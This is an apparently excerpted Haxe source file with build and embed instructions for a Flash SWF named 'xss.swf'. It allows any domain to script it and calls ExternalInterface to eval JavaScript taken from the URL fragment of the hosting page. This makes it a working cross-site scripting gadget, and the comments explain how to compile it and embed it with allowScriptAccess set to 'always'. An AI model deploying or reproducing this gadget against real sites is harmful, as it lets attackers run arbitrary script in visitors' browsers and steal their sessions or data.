4 // This haxe source file builds a SWF which injects JavaScript into the including page.
7 // 1. Acquire the latest stable version of haxe from http://haxe.org/download
8 // Note: To run haxe, you may also need Neko (http://nekovm.org/download)
9 // 2. Create a file called xss.hx with these contents.
10 // 3. Create a file called compile.hxml with the following content:
14 // 4. From the command line, execute:
18 // 1. Take xss.swf generated by haxe and deploy it to your webserver.
19 // 2. Embed it into your HTML file with code like the following:
21 // id="xss" class="hidden"
22 // classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
23 // codebase="http://fpdownload.adobe.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0">
24 // <param name="movie" value="xss.swf" />
25 // <param name="allowScriptAccess" value="always" />
29 // allowScriptAccess="always"
30 // type="application/x-shockwave-flash"
31 // pluginspage="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash">
36 import flash.external.ExternalInterface;
40 public static function main() {
41 flash.system.Security.allowDomain("*");
42 ExternalInterface.call( [ "(function(){setTimeout(\"",
43 "eval(document.location.hash.slice(1))",
44 "\",0);})" ].join('') );